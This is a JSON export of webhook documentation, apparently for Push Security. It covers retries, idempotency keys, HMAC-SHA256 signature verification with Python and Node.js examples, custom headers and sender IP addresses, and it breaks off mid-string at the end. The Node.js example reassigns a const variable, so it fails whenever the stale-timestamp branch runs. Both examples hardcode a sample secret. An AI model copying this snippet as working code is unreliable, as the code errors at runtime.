{"items":[{"type":"link","label":"Push Security Webhooks","link":"/webhooks-v1","routeSlug":"/webhooks-v1","content":{"contentType":"overview","meta":{"name":"Push Security Webhooks"},"children":[{"nodeType":"container","panels":[{"title":"Download OpenAPI description","titleTranslationKey":"download.description.title","children":[{"kind":"download","label":"webhooks-v1.json","url":"/help/audience/engineering/_bundle/webhooks-v1.json?download"},{"kind":"download","label":"webhooks-v1.yaml","url":"/help/audience/engineering/_bundle/webhooks-v1.yaml?download"}]},{"title":"Overview","titleTranslationKey":"info.title","children":[{"kind":"externallink","title":"URL","titleTranslationKey":"info.contact.url","label":"https://pushsecurity.com/contact/","url":"https://pushsecurity.com/contact/"},{"kind":"email","title":"support","email":"support@pushsecurity.com","label":"support@pushsecurity.com","withCopyButton":true,"copyContent":"support@pushsecurity.com"},{"kind":"externallink","title":"License","titleTranslationKey":"info.license","label":"Commercial","url":"https://pushsecurity.com/legal/terms/"},{"kind":"externallink","label":"Terms of Service","labelTranslationKey":"info.termsOfService","url":"https://pushsecurity.com/legal/terms/"}]},{"title":"Servers","titleTranslationKey":"servers.title","children":[{"kind":"servers","servers":[{"url":"https://api.pushsecurity.com"}],"mode":"default"}]}],"children":[{"nodeType":"overview-section-wrapper","children":[{"nodeType":"header","level":1,"label":"Push Security Webhooks (v1)","showPageActions":true},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[]}],"sectionId":"/webhooks-v1"}],"sectionId":"/webhooks-v1"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/overview"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Overview"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Configure webhooks for the Push Security platform and receive real-time updates when events occur."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Each webhook event has the following:"},"children":[]}]}]},{"$$mdtype":"Node","type":"list","attributes":{"ordered":false,"marker":"*"},"children":[{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Versioning"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Idempotency key"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Metadata"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"New and old objects to show exactly what has changed"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"A signature for verifying sender authenticity"},"children":[]}]}]}]}]}],"sectionId":"/webhooks-v1/section/overview"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/creating-webhooks"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Creating webhooks"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"To create or manage your webhooks, go to the "},"children":[]},{"$$mdtype":"Node","type":"link","inline":true,"attributes":{"href":"https://console.pushsecurity.com/app/settings/webhooks"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Settings"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" page in the Push admin console."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/creating-webhooks"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/acknowledging-an-event"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Acknowledging an event"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Your endpoint has 5 seconds to respond with a "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"200 OK"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" (or any other 2xx response). Otherwise, retry behavior will be triggered."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/acknowledging-an-event"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/retry-behavior"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Retry behavior"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Each event will be sent a maximum of 4 times at the following time intervals:"},"children":[]}]}]},{"$$mdtype":"Node","type":"list","attributes":{"ordered":false,"marker":"*"},"children":[{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Immediately"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"After 1 minute"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"After 5 minutes"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"After 15 minutes"},"children":[]}]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"If the event is acknowledged within a 5-second window, no more retries will be attempted."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Each retry of the event will have a newly generated "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"X-Signature"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":", but the event "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"id"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" will be the same for all retries."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/retry-behavior"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/handling-duplicate-events"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Handling duplicate events"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The payload body is JSON-encoded and contains an idempotency key named "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"id"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":". If you want to ensure that you handle an event exactly once, please store this value and compare it against incoming events. This can be used to discard duplicate events that have been delivered more than once."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/handling-duplicate-events"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/verifying-signatures"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Verifying signatures"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Each event has a header "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"X-Signature"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" which contains 2 parts:"},"children":[]}]}]},{"$$mdtype":"Node","type":"list","attributes":{"ordered":false,"marker":"*"},"children":[{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"A UNIX timestamp value "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"t"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" (in seconds)"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"An HMAC-SHA-256 value "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"v1"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" which contains the payload signature to check using your webhook secret obtained at the time you created it"},"children":[]}]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Here is an example of how it is formatted:"},"children":[]}]}]},{"$$mdtype":"Node","type":"fence","attributes":{"content":"X-Signature: t=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE\n"},"children":[{"$$mdtype":"Node","type":"text","attributes":{"content":"X-Signature: t=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE\n"},"children":[]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"To calculate and verify the signature, perform the following steps:"},"children":[]}]}]},{"$$mdtype":"Node","type":"list","attributes":{"ordered":true,"marker":"."},"children":[{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Parse the "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"X-Signature"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" header by splitting it first by "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":","},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" and then by "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"="},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" to obtain key-value pairs."},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Store the "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"t"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" (timestamp) and "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"v1"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" (signature) values in variables."},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Concatenate the value of "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"t"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" (as a string) with a "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"."},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" and the JSON request body (in its raw format)."},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Use the HMAC-SHA256 algorithm to compute the hash of the concatenated string."},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Compare the computed HMAC with the "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"v1"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" value from the header to verify the signature."},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Additionally, check the timestamp ("},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"t"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":") and compare it to the current time. If the difference is bigger than 35 mins (or your preferable threshold) you should discard the event to avoid replay attacks."},"children":[]}]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Example in Python:"},"children":[]}]}]},{"$$mdtype":"Node","type":"fence","attributes":{"content":"import json\nimport hmac\nimport hashlib\nimport time\n\n# Your secret key for the webhook\nSECRET_KEY = b'psws_ad9d0bba8260baf774c3821acaff1b7d'\n\n# Example header and request body (you would normally get these from the incoming HTTP request)\nexample_header = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE'\nexample_request_body = json.dumps({\"key\": \"value\"})\n\n# Step 1: Parse the header\nelements = example_header.split(',')\nparsed_header = {}\nfor element in elements:\n    key, value = element.split('=')\n    parsed_header[key] = value\n\n# Step 2: Store 't' and 'v1' values in variables\nreceived_t = parsed_header.get('t')\nreceived_v1 = parsed_header.get('v1')\n\n# Step 3: Concatenate 't' value with '.' and the JSON request body\npayload = f\"{received_t}.{example_request_body}\"\n\n# Step 4: Compute the HMAC using SHA256\ncomputed_hmac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest().upper()\n\n# Step 5: Compare the signature\nis_valid = hmac.compare_digest(received_v1, computed_hmac)\n\n# Step 6: Check the timestamp\ncurrent_time = int(time.time())\ntime_difference = current_time - int(received_t)\nif time_difference > 2100:  # 35 minutes\n    is_valid = False\n    message = \"Timestamp is too old.\"\nelse:\n    message = \"Signature verified\" if is_valid else \"Signature mismatch\"\n\nprint(f\"Is the signature valid? {is_valid}. Message: {message}\")\n","language":"py"},"children":[{"$$mdtype":"Node","type":"text","attributes":{"content":"import json\nimport hmac\nimport hashlib\nimport time\n\n# Your secret key for the webhook\nSECRET_KEY = b'psws_ad9d0bba8260baf774c3821acaff1b7d'\n\n# Example header and request body (you would normally get these from the incoming HTTP request)\nexample_header = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE'\nexample_request_body = json.dumps({\"key\": \"value\"})\n\n# Step 1: Parse the header\nelements = example_header.split(',')\nparsed_header = {}\nfor element in elements:\n    key, value = element.split('=')\n    parsed_header[key] = value\n\n# Step 2: Store 't' and 'v1' values in variables\nreceived_t = parsed_header.get('t')\nreceived_v1 = parsed_header.get('v1')\n\n# Step 3: Concatenate 't' value with '.' and the JSON request body\npayload = f\"{received_t}.{example_request_body}\"\n\n# Step 4: Compute the HMAC using SHA256\ncomputed_hmac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest().upper()\n\n# Step 5: Compare the signature\nis_valid = hmac.compare_digest(received_v1, computed_hmac)\n\n# Step 6: Check the timestamp\ncurrent_time = int(time.time())\ntime_difference = current_time - int(received_t)\nif time_difference > 2100:  # 35 minutes\n    is_valid = False\n    message = \"Timestamp is too old.\"\nelse:\n    message = \"Signature verified\" if is_valid else \"Signature mismatch\"\n\nprint(f\"Is the signature valid? {is_valid}. Message: {message}\")\n"},"children":[]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Example in Node.js:"},"children":[]}]}]},{"$$mdtype":"Node","type":"fence","attributes":{"content":"const crypto = require('crypto');\n\n// Your secret key for the webhook\nconst SECRET_KEY = 'psws_ad9d0bba8260baf774c3821acaff1b7d';\n\n// Example header and request body (you'd normally get these from the incoming HTTP request)\nconst exampleHeader = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE';\nconst exampleRequestBody = JSON.stringify({ key: 'value' });\n\n// Step 1: Parse the header\nconst elements = exampleHeader.split(',');\nconst parsedHeader = {};\nelements.forEach((element) => {\n  const [key, value] = element.split('=');\n  parsedHeader[key] = value;\n});\n\n// Step 2: Store 't' and 'v1' values in variables\nconst receivedT = parsedHeader['t'];\nconst receivedV1 = parsedHeader['v1'];\n\n// Step 3: Concatenate 't' value with '.' and the JSON request body\nconst payload = `${receivedT}.${exampleRequestBody}`;\n\n// Step 4: Compute the HMAC using SHA256\nconst computedHmac = crypto.createHmac('sha256', SECRET_KEY).update(payload).digest('hex');\n\n// Step 5: Compare the signature\nconst isValid = crypto.timingSafeEqual(Buffer.from(receivedV1, 'hex'), Buffer.from(computedHmac, 'hex'));\n\n// Step 6: Check the timestamp\nconst currentTime = Math.floor(Date.now() / 1000);\nconst timeDifference = currentTime - parseInt(receivedT, 10);\nlet message;\n\nif (timeDifference > 2100) {  // 35 minutes\n  isValid = false;\n  message = 'Timestamp is too old.';\n} else {\n  message = isValid ? 'Signature verified' : 'Signature mismatch';\n}\n\nconsole.log(`Is the signature valid? ${isValid}. Message: ${message}`);\n\n","language":"js"},"children":[{"$$mdtype":"Node","type":"text","attributes":{"content":"const crypto = require('crypto');\n\n// Your secret key for the webhook\nconst SECRET_KEY = 'psws_ad9d0bba8260baf774c3821acaff1b7d';\n\n// Example header and request body (you'd normally get these from the incoming HTTP request)\nconst exampleHeader = 't=1698349494,v1=0E01666E58BC2E6C64E9A5DA66C28CF9D88C3E342CCFC029D56B749A4B4282CE';\nconst exampleRequestBody = JSON.stringify({ key: 'value' });\n\n// Step 1: Parse the header\nconst elements = exampleHeader.split(',');\nconst parsedHeader = {};\nelements.forEach((element) => {\n  const [key, value] = element.split('=');\n  parsedHeader[key] = value;\n});\n\n// Step 2: Store 't' and 'v1' values in variables\nconst receivedT = parsedHeader['t'];\nconst receivedV1 = parsedHeader['v1'];\n\n// Step 3: Concatenate 't' value with '.' and the JSON request body\nconst payload = `${receivedT}.${exampleRequestBody}`;\n\n// Step 4: Compute the HMAC using SHA256\nconst computedHmac = crypto.createHmac('sha256', SECRET_KEY).update(payload).digest('hex');\n\n// Step 5: Compare the signature\nconst isValid = crypto.timingSafeEqual(Buffer.from(receivedV1, 'hex'), Buffer.from(computedHmac, 'hex'));\n\n// Step 6: Check the timestamp\nconst currentTime = Math.floor(Date.now() / 1000);\nconst timeDifference = currentTime - parseInt(receivedT, 10);\nlet message;\n\nif (timeDifference > 2100) {  // 35 minutes\n  isValid = false;\n  message = 'Timestamp is too old.';\n} else {\n  message = isValid ? 'Signature verified' : 'Signature mismatch';\n}\n\nconsole.log(`Is the signature valid? ${isValid}. Message: ${message}`);\n\n"},"children":[]}]}]}],"sectionId":"/webhooks-v1/section/verifying-signatures"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/versioning"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Versioning"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The payload body is JSON-encoded and contains a value named "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"version"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":". You're currently working with version 1 of the Push Security webhooks. Should there be any breaking changes in the future, we'll bump up this version number. If you have any webhooks configured, we'll send you notifications over email about the deprecation date for the older version."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/versioning"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/custom-headers"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Custom headers"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Some SIEMs or other external systems where you may wish to send Push webhook events require a custom HTTP header for authorization. You can configure a custom header for webhooks in the Push admin console."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Go to "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Settings"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" > "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Webhooks"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" and add a new webhook. You will see a dropdown option for "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Custom headers"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Then enter a header key and value. Note that once your header key and value are entered, you will not be able to view them again, as they may contain secrets."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/custom-headers"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/filtering-events"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Filtering events"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"You may wish to send only specific types (or categories) of Push webhook events to your receiver. You can configure this when creating a new webhook in the Push admin console."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Go to "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Settings"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" > "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Webhooks"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" and add a new webhook. You will see a dropdown option for "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Select events"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Then you can select the specific events, or categories of events, to enable. If you select a category, any new events that are added to that category later (as part of new features released) will also be sent."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/filtering-events"},{"nodeType":"overview-section-wrapper","children":[{"nodeType":"markdoc","content":[{"$$mdtype":"Node","type":"heading","attributes":{"level":2,"id":"section/ip-addresses"},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"IP addresses"},"children":[]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Push sends webhook events from three static IP addresses:"},"children":[]}]}]},{"$$mdtype":"Node","type":"list","attributes":{"ordered":false,"marker":"*"},"children":[{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"34.241.178.196"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"54.75.174.254"},"children":[]}]}]},{"$$mdtype":"Node","type":"item","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"52.214.240.129"},"children":[]}]}]}]},{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"We recommend that you allowlist these addresses. "},"children":[]},{"$$mdtype":"Node","type":"strong","inline":true,"attributes":{"marker":"**"},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Note"},"children":[]}]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":": These addresses are within the AWS EC2 public IP range for "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"eu-west-1"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" that were used prior to March 2026. Existing customers do not need to update their allowlist unless they wish to narrow it to just these static IP addresses."},"children":[]}]}]}]}],"sectionId":"/webhooks-v1/section/ip-addresses"}]}]}},{"type":"link","label":"Overview","link":"/webhooks-v1/section/overview","routeSlug":"/webhooks-v1/section/overview","content":null},{"type":"link","label":"Creating webhooks","link":"/webhooks-v1/section/creating-webhooks","routeSlug":"/webhooks-v1/section/creating-webhooks","content":null},{"type":"link","label":"Acknowledging an event","link":"/webhooks-v1/section/acknowledging-an-event","routeSlug":"/webhooks-v1/section/acknowledging-an-event","content":null},{"type":"link","label":"Retry behavior","link":"/webhooks-v1/section/retry-behavior","routeSlug":"/webhooks-v1/section/retry-behavior","content":null},{"type":"link","label":"Handling duplicate events","link":"/webhooks-v1/section/handling-duplicate-events","routeSlug":"/webhooks-v1/section/handling-duplicate-events","content":null},{"type":"link","label":"Verifying signatures","link":"/webhooks-v1/section/verifying-signatures","routeSlug":"/webhooks-v1/section/verifying-signatures","content":null},{"type":"link","label":"Versioning","link":"/webhooks-v1/section/versioning","routeSlug":"/webhooks-v1/section/versioning","content":null},{"type":"link","label":"Custom headers","link":"/webhooks-v1/section/custom-headers","routeSlug":"/webhooks-v1/section/custom-headers","content":null},{"type":"link","label":"Filtering events","link":"/webhooks-v1/section/filtering-events","routeSlug":"/webhooks-v1/section/filtering-events","content":null},{"type":"link","label":"IP addresses","link":"/webhooks-v1/section/ip-addresses","routeSlug":"/webhooks-v1/section/ip-addresses","content":null},{"type":"separator","label":"Events","content":null},{"type":"group","label":"Activity","link":"/webhooks-v1/activity","routeSlug":"/webhooks-v1/activity","items":[{"label":"File download","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/activity/file-download-event","routeSlug":"/webhooks-v1/activity/file-download-event","metadata":{"seo":{"title":"File download","description":"File download"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"file-download-event","name":"File 